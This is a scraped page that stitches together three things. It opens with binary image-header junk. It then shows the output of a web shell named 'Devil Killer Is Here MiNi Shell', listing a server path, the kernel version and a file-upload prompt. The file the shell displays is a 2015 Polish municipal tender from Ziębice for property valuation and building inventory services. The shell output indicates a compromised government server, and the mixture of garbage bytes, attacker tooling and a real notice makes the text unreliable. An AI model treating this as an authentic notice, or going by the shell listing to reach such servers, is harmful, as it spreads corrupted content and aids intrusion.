JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150520/72857-N-2015.html

<p class="kh_header"><b>Ziębice: ŚWIADCZENIE USŁUG USTALANIA WARTOŚCI NIERUCHOMOŚCI I WYKONANIA INWENTARYZACJI BUDYNKÓW NA TERENIE MIASTA I GMINY ZIĘBICE</b><br>
<b>Numer ogłoszenia: 72857 - 2015; data zamieszczenia: 20.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ziębice , ul. Przemysłowa 10, 57-220 Ziębice, woj. dolnośląskie, tel. 074 8163870, faks 074 8191212.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ziebice.biuletyn.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG USTALANIA WARTOŚCI NIERUCHOMOŚCI I WYKONANIA INWENTARYZACJI BUDYNKÓW NA TERENIE MIASTA I GMINY ZIĘBICE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia:
1.	Ustalanie wartości nieruchomości:
1)	nieruchomości  lokalowe:
a)	mieszkalne z pomieszczeniami przynależnymi i udziałem w gruncie - szt  85
b)	użytkowe z pomieszczeniami   przynależnymi i udziałem w gruncie - szt  55;
2)	budynki mieszkalne z pomieszczeniami przynależnymi i gruntem:
a)	o jednej kondygnacji -  szt  22
b)	do trzech kondygnacji -  szt  36;
3)	budynki niemieszkalne z gruntem:
a)	o jednej kondygnacji -  szt  60
b)	do trzech kondygnacji -szt  17;
4)	działki gruntowe niezabudowane:
a)	pod zabudowę mieszkaniową - szt  37
b)	na cele rolne i na cele inne niż mieszkaniowe - szt  45;
5)	udział w nieruchomości zabudowanej (budynek mieszkalny z budynkami gospodarczymi oraz grunt) - szt  37;
6)	działki gruntowe, które zostaną wniesione przez Gminę jako wkład niepieniężny (aport) do spółki - szt  10;
7)	pomieszczenia przynależne   wyłączone    z    części    wspólnej   nieruchomości  do  celu          dokonania   w   umowie  nowego  ustalenia  wysokości udziałów w nieruchomości        wspólnej  -  szt  15;
8)	działki gruntowe do ustalania opłaty za przekształcenie prawa użytkowania wieczystego        w prawo własności nieruchomości  - szt  30;
9)	ustalenie wartości nieruchomości dla potrzeb komunalizacji - szt   12;
10)	nasadzenia - szt  10;
11)	ustalanie    wartości    nakładów    na    remont    dokonanych    przez    najemcę
za  zgodą         wynajmującego   w   okresie  5 lat   przed   dniem   złożenia   wniosku
o  kupno   lokalu/         budynku, a  obciążających   wynajmującego - szt  60;
12)	ustalenie wartości nieruchomości dla potrzeb naliczenia opłaty z tytułu przekazania       w trwały zarząd:
a)	działki  gruntowe  niezabudowane - szt  15
b)	działki  gruntowe  zabudowane budynkami do trzech  kondygnacji - szt. 15;
13)	ustalenie   wartości   początkowej   środków   trwałych   zgodnie   z   art. 28  ust. 1  pkt. 1       ustawy  z   dnia  29.09.1994  roku  - o  rachunkowości (t.j.: Dz.U.2013, poz. 330 z późn. zm) dla  nieruchomości  nabytych  przez Gminę z mocy prawa na  podstawie  decyzji  komunalizacyjnych  wydanych  w latach 1990-1993:
a)	nieruchomości zabudowanych -działki gruntowe z jednokondygnacyjnymi budynkami- remizy OSP: 
- Lubnów nr 112b -działka nr 212/2, 
- Bożnowice nr 42a- działka nr 219, 
- Wigańcice nr 62b-dzialka 536/2 
         razem - szt. 3;
b)	nieruchomości  zabudowanej - działka gruntowa z trzykondygnacyjnym budynkiem (z wyodrębnieniem wartości wg udziału dla świetlicy OSP, garażu OSP sklepu i świetlicy wiejskiej): 
- Starczówek nr 39- działka 234/2) - szt. 1;
c)	nieruchomości zabudowanych - działki gruntowe z jednokondygnacyjnymi budynkami - świetlice  wiejskie:  
- Czerńczyce nr 28c- działka 84/1 z ogrodzeniem,  
- Raczyce nr 27b - działka nr 136/3 z ogrodzeniem, 
- Skalice nr 16b- działka nr 113/2
razem - szt. 3;
d)	nieruchomości zabudowanych - działki gruntowe z budynkami do trzech  kondygnacji- świetlice wiejskie: 
- Bożnowice nr 41a-działka nr 194,  
- Krzelków nr 16 -działka nr 62/1,  
- Lubnów nr 87- działka nr 179,   
- Rososznica nr 49a- działka nr 139/2, 
- Wadochowice nr 22 -działka nr 19/2, 
- Wigańcice nr 62a- działka nr 535/8 
razem - szt. 6;
e)	nieruchomości  lokalowych ( lokale użytkowe z udziałem w gruncie): 
- garaż OSP w  Witostowicach  nr  12 - działka nr 137/1,
- świetlica  wiejska  w  Witostowicach  nr  12 - działka nr 137/1,
- świetlica  wiejska     w Osinie Małej nr 4 - działka nr 3/1 
         razem -  szt. 3;
f)	nieruchomości zabudowanej w Ziębicach (działka gruntowa z zabytkową Bramą Paczkowską oraz       fragmentem  muru  obronnego) - szt.1;
g)	Pomnik Orła Piastowskiego w Ziębicach  z chodnikiem, schodami wejściowymi i tarasami działka 444/5 obręb: Wschód- szt. 1;
h)	Pomnik  XXV- lecia PRL w Henrykowie (cokół z obeliskiem) z ogrodzeniem działka nr 304 obręb Henryków - szt. 1;
i)	nieruchomości niezabudowanej działka nr 459/1 w Ziębicach, obręb: Wschód (składowisko   odpadów)  -  szt 1;
j)	nieruchomości zabudowanej (działka gruntowa  nr 258  w  Ziębicach,  obręb Wschód z  ogrodzeniem  i  kaplicą   pogrzebową  -  cmentarz  komunalny) - szt. 1;
14)	ustalenie    wartości    nieruchomości    przy    uwzględnieniu    przeznaczenia    terenu obowiązującego przed zmianą  planu oraz przy  uwzględnieniu  przeznaczenia  terenu obowiązującego po uchwaleniu  miejscowego planu zagospodarowania przestrzennego dla potrzeb ustalenia wysokości odszkodowania z tytułu obniżenia wartości nieruchomości lub ustalenia wysokości opłaty tytułu wzrostu wartości nieruchomości (art.  36  i  37 ustawy z  27 marca 2003 roku  - o  planowaniu  i  zagospodarowaniu   przestrzennym (t.j.: Dz.U. 2015, poz. 199) - 5 szt;   
15)	ustalenie    wartości    nieruchomości   dla ustalenia opłaty adiacenckiej, o której mowa w art. 98a ust. 1 ustawy z dnia 21 sierpnia 1997 roku - o gospodarce nieruchomościami (t.j.Dz.U.2014, poz 518 z późn. zm.) - 20 szt; 

2.	Wykonanie  inwentaryzacji budynków, budowli obejmuje: 
1)	lokale mieszkalne  i użytkowe  w budynkach - szt  90;
2)	budynki mieszkalne i użytkowe o jednej kondygnacji -  szt  22;
3)	budynki mieszkalne i użytkowe do trzech kondygnacji  -  szt  26;
4)	budynki, w których znajdują się remizy OSP:
a)	budynki  jednokondygnacyjne: 
-	Lubnów nr 112b(działka nr 212/2), 
-	Bożnowice nr 42a(działka nr 219), 
-	Wigańcice  nr 62b(działka nr 536/2) 
razem - szt. 3;
b)	budynki  trzykondygnacyjne:
-	Starczówek  nr 39(działka nr 234/2), w którym znajduje się świetlica OSP, garaż OSP, sklep, świetlica wiejska  z ustaleniem udziału dla wymienionych lokali - szt. 1;
5)	budynki, w których znajdują się świetlice wiejskie:
a)	budynki  jednokondygnacyjne: 
-	Czerńczyce nr 28c- działka 84/1 z ogrodzeniem,  
-	Raczyce nr 27b - działka nr 136/3 z ogrodzeniem, 
-	Skalice nr 16b- działka nr 113/2
razem - szt. 3;
b)	budynki  do trzech  kondygnacji:
-	Bożnowice nr 41a-działka nr 194,  
-	Krzelków nr 16 -działka nr 62/1,  
-	Lubnów nr 87- działka nr 179, 
-	Rososznica nr 49a- działka nr 139/2, 
-	Wadochowice nr 22 -działka nr 19/2, 
-	Wigańcice nr 62a- działka nr 535/8 
razem - szt. 6;
6)	pomnik  XXV- lecia PRL w Henrykowie (cokół z obeliskiem) z ogrodzeniem działka nr 304- szt. 1;
7)	kaplica pogrzebowa z ogrodzeniem cmentarza komunalnego w Ziębicach - szt. 1;
8)	pomieszczenia przynależne -  szt.  66;
9)	ustalenie udziałów w budynkach  mieszkalnych, użytkowych, gospodarczych - szt  35;
10)	sporządzenie aneksu do inwentaryzacji -  szt.  30.

3.	Przedmiot zamówienia  będzie realizowany na podstawie odrębnych zleceń, 
4.	Usługi  będą zlecane sukcesywnie w miarę bieżących potrzeb Zamawiającego, na podstawie szczegółowego zakresu rzeczowego i ilościowego określonego w odrębnym zleceniu.
5.	Dniem wykonania usługi z odrębnego zlecenia jest dzień wpływu operatu szacunkowego i/lub operatu inwentaryzacyjnego oraz opinii uzasadniającej brak wzrostu wartości nieruchomości, do siedziby Zamawiającego potwierdzony protokołem przekazania prac (załącznik nr 1 do niniejszej umowy).
6.	W ramach usługi ustalania wartości nieruchomości Wykonawca:
1)	sporządza pisemne zawiadomienie ( za potwierdzeniem odbioru) przyszłego nabywcy lokalu, budynku/ działki gruntowej o terminie wizyty oraz przeprowadzeniu oględzin nieruchomości podlegającej wycenie, w terminie do 7 dni od dnia doręczenia Wykonawcy odrębnego zlecenia,
2)	sporządza operat szacunkowy wyceny nieruchomości określający wartość łączną i w rozbiciu  gruntu i/lub budynku/lokalu w dwóch egzemplarzach operatu  oraz jednego egzemplarza wyciągu z operatu  ze szkicem lokalu i pomieszczeń przynależnych  w terminie do 30 dni  od dnia doręczenia Wykonawcy odrębnego zlecenia, zawierający w szczególności:
a)	dokumentację fotograficzną  wycenianej nieruchomości,
b)	protokół  oględzin nieruchomości sporządzony w obecności strony,
c)	notatkę z badania księgi wieczystej,
d)	kopię wypisu i wyrysu z ewidencji gruntów i budynków,
e)	zaświadczenie  o  przeznaczeniu  w  miejscowym  planie  zagospodarowania przestrzennego (w przypadku sporządzania operatu szacunkowego w celu ustalenia opłaty   planistycznej   zaświadczenie   musi   zawierać   dodatkowo   informację   o przeznaczeniu przed  i po zmianie planu),
f)	kserokopię decyzji podziałowej w przypadku sporządzenia operatu szacunkowego w celu ustalenia opłaty adiacenckiej z tytułu podziału nieruchomości.
3)	zawiadamia pisemnie Wydział Gospodarki Nieruchomościami i Rolnictwa Urzędu Miejskiego w Ziębicach o braku możliwości dokonania oględzin nieruchomości podlegającej wycenie z podaniem przyczyny, niezwłocznie  po zaistnieniu takiej sytuacji,
4)	składa na żądanie Zamawiającego ustne i pisemne wyjaśnienia w zakresie dotyczącym wykonanego operatu szacunkowego, a także wyjaśnienia na potrzeby prowadzonego postępowania administracyjnego w terminie do 7 dni licząc od dnia otrzymania żądania od Zamawiającego 
5)	zgłasza się na wezwania w rozpatrywanych przed Zamawiającym, samorządowym kolegium odwoławczym, sądem administracyjnym, sądem powszechnych oraz przed innymi organami, postępowaniach, którego dotyczy operat szacunkowy aż do momentu zakończenia postępowania, bez prawa do dodatkowego wynagrodzenia. 
7.	Wykonawca potwierdza w okresie 12-stu miesięcy od sporządzenia operatu szacunkowego  na żądanie Zamawiającego aktualność operatu szacunkowego zgodnie z postanowieniami art. 156 ust. 4 ustawy - o gospodarce nieruchomościami oraz rozporządzenia z dnia 21 września 2004 roku Rady Ministrów   w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego w ramach wynagrodzenia należnego za wykonanie operatu szacunkowego (Dz.U. 2004 Nr 207, poz. 2109 z późn. zm.), zgodnie z ofertą Wykonawcy, przy czym ilość potwierdzeń aktualności nie może dotyczyć  więcej  niż 10-ciu  operatów.
8.	W przypadku stwierdzenia przez Wykonawcę braku wzrostu wartości nieruchomości
na skutek podziału nieruchomości, Zamawiający dopuszcza sporządzenie opinii uzasadniającej brak wzrostu wartości, która będzie podstawą odstąpienia przez organ
od naliczenia opłaty adiacenckiej. 
9.	W ramach usługi wykonania inwentaryzacji budynków Wykonawca:
1)	pisemnie zawiadamia (za potwierdzeniem odbioru) najemców/właścicieli lokali/budynków o terminach wizyt Wykonawcy  celem wykonania pomiarów podlegających opracowaniom inwentaryzacyjnym,  w terminie do 7 dni od dnia doręczenia Wykonawcy odrębnego zlecenia,
2)	sporządza trzy egzemplarze operatów  inwentaryzacyjnych,  w terminie do 30 dni
od dnia   doręczenia Wykonawcy odrębnego zlecenia, zawierające w szczególności:
a)	rzuty kondygnacji i szkice lokali oraz pomieszczeń przynależnych niezbędne
do uzyskania zaświadczenia o samodzielności lokali wraz  z zestawieniem powierzchni mieszkalnej, użytkowej i określeniem udziału w nieruchomości wspólnej dla wszystkich lokali położonych  w budynku, potwierdzone podpisem osoby uprawnionej i opatrzone datą sporządzenia, w przypadku operatu inwentaryzacyjnego budynku mieszkalnego/ użytkowego, 
b)	rzuty kondygnacji i szkice pomieszczeń  wraz z zestawieniem powierzchni użytkowej, potwierdzone podpisem osoby uprawnionej oraz  określenie udziału
w budynku dla wszystkich pomieszczeń w nim położonych, w przypadku opracowania operatu inwentaryzacyjnego budynków gospodarczych /komórek/,
3)	pisemnie zawiadamia Wydział Gospodarki Nieruchomościami i Rolnictwa Urzędu Miejskiego w Ziębicach o braku możliwości wykonania pomiarów podlegających opracowaniom inwentaryzacyjnym z podaniem przyczyny, niezwłocznie po zaistnieniu takiej sytuacji,
4)	składa na żądanie Zamawiającego ustne i pisemne wyjaśnienia w zakresie dotyczącym wykonanego operatu inwentaryzacyjnego, w terminie do 7 dni licząc od dnia otrzymania żądania od Zamawiającego.
10.	Wykonawca zobowiązany będzie do wykonania przedmiotu zamówienia w trybie
i w sposób określony przepisami obowiązującego w danym zakresie prawa oraz obowiązującymi normami i standardami zawodowymi, ze szczególną starannością właściwą dla zawodowego charakteru tych czynności oraz zasadami etyki zawodowej, kierując się zasadą bezstronności.
1)	Wykonawca zobowiązany będzie do informowania Zamawiającego o zauważonych różnicach wynikających ze stanu faktycznego a dostępnymi dokumentami.
11.	Wykonawca obowiązany będzie do  wykonywania zleconych usług zgodnie z przepisami  ustawy z dnia 29 sierpnia 1997 roku   o ochronie danych osobowych  (t.j.: Dz.U.2014,  poz. 1182 z późn. zm.)..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające zostaną udzielone na podstawie odrębnej umowy w trybie zamówienia z wolnej ręki na podstawie art. 67 ust. 1 pkt 6 ustawy Pzp. zamówienia uzupełniające mogą zostać udzielone w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług, stanowiących nie więcej niż     50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.25.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
-	co najmniej 1 usługę szacowania nieruchomości gruntowych zabudowanych lub/i niezabudowanych o łącznej wartości nie mniejszej niż  30 000 zł brutto
spełnienie powyższego warunku udziału w postępowaniu następuje poprzez  zrealizowanie ww. usługi w ramach jednego zamówienia (jednej umowy)
-	co najmniej 7 operatów szacunkowych, w celu ustalenia opłaty adiacenckiej. 
spełnienie powyższego warunku udziału w postępowaniu następuje poprzez  zrealizowanie ww. usługi w ramach jednego zamówienia lub w ramach kilku odrębnych zamówień, w których łączna liczba i zakres wykonanych operatów szacunkowych spełniać  będzie ww. wymagania.
-	co najmniej 3 operatów  szacunkowych dotyczących ustalenia wartości nieruchomości przy uwzględnieniu przeznaczenia terenu obowiązującego przed zmianą planu oraz przy uwzględnieniu przeznaczenia terenu obowiązującego po uchwaleniu miejscowego planu zagospodarowania przestrzennego dla potrzeb ustalenia wysokości odszkodowania
z tytułu obniżenia wartości nieruchomości lub ustalenia wysokości opłaty z tytułu wzrostu wartości nieruchomości (art.36 i 37 ustawy z 27 marca 2003 roku - o planowaniu i zagospodarowaniu przestrzennym),
spełnienie powyższego warunku udziału w postępowaniu następuje poprzez  zrealizowanie ww. usługi w ramach jednego zamówienia lub w ramach kilku odrębnych zamówień, w których łączna liczba i zakres wykonanych operatów szacunkowych spełniać  będzie ww. wymagania.
W przypadku wykonawców którzy wykażą roboty budowlane  w innych walutach niż złoty polski zamawiający przeliczy podane kwoty po średnim kursie NBP z dnia ukazania się ogłoszenia o zamówieniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli wykonawca wykaże:
-  iż dysponuje co najmniej jedną osobą zdolną do wykonania zamówienia, która będzie uczestniczyć w wykonaniu zamówienia, posiadającą uprawnienia zawodowe w zakresie szacowania nieruchomości oraz uzyskała wpis do centralnego rejestru rzeczoznawców majątkowych zgodnie z przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami dział V (t.j.: Dz. U. z 2014 r. poz. 518 z późn. zm.).
Art. 174 ust. 3b
- złoży oświadczenie, iż osoba które będzie uczestniczyć w wykonaniu zamówienia posiada uprawnienia zawodowe w zakresie szacowania nieruchomości oraz uzyskała wpis do centralnego rejestru rzeczoznawców majątkowych zgodnie z przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami dział V (t.j.: Dz. U. z 2014 r. poz. 518 z późn. zm).

Zamawiający określając wymóg w zakresie dysponowania osobami zdolnymi                                    do wykonania zamówienia, dopuszcza osoby które posiadają kwalifikacje zawodowe obywateli państw członkowskich Unii Europejskiej, którym, na zasadach określonych  w ustawie
z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008 Nr 63, poz. 394 z późn. zm.), uznano nabyte w tych państwach kwalifikacje do wykonywania zawodu rzeczoznawcy majątkowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli wykonawca wykaże, iż posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 100.000,00 PLN.
W przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia przy ocenie spełniania warunku udziału w postępowaniu potencjał ekonomiczny i finansowy będzie podlegał sumowaniu.

W przypadku wykonawców, którzy wykażą posiadanie środków finansowych lub zdolności kredytowej w innych walutach niż złoty polski zamawiający przeliczy podane kwoty po średnim kursie NBP z dnia ukazania się ogłoszenia o zamówieniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający określa, że usługi, których dotyczy obowiązek wykazania przez Wykonawcę w wykazie i złożenie dla nich poświadczeń dotyczy: 
-	co najmniej 1 usługę szacowania nieruchomości gruntowych zabudowanych lub/i niezabudowanych o łącznej wartości nie mniejszej niż  30 000 zł brutto
spełnienie powyższego warunku udziału w postępowaniu następuje poprzez  zrealizowanie ww. usługi w ramach jednego zamówienia (jednej umowy)
-	co najmniej 7 operatów szacunkowych, w celu ustalenia opłaty adiacenckiej. 
spełnienie powyższego warunku udziału w postępowaniu następuje poprzez  zrealizowanie ww. usługi w ramach jednego zamówienia lub w ramach kilku odrębnych zamówień, w których łączna liczba i zakres wykonanych operatów szacunkowych spełniać  będzie ww. wymagania.
-	co najmniej 3 operatów  szacunkowych dotyczących ustalenia wartości nieruchomości przy uwzględnieniu przeznaczenia terenu obowiązującego przed zmianą planu oraz przy uwzględnieniu przeznaczenia terenu obowiązującego po uchwaleniu miejscowego planu zagospodarowania przestrzennego dla potrzeb ustalenia wysokości odszkodowania
z tytułu obniżenia wartości nieruchomości lub ustalenia wysokości opłaty z tytułu wzrostu wartości nieruchomości (art.36 i 37 ustawy z 27 marca 2003 roku - o planowaniu i zagospodarowaniu przestrzennym),
spełnienie powyższego warunku udziału w postępowaniu następuje poprzez  zrealizowanie ww. usługi w ramach jednego zamówienia lub w ramach kilku odrębnych zamówień, w których łączna liczba i zakres wykonanych operatów szacunkowych spełniać  będzie ww. wymagania.
Zamawiający nie żąda wykazania usług niewykonanych lub wykonanych nienależycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

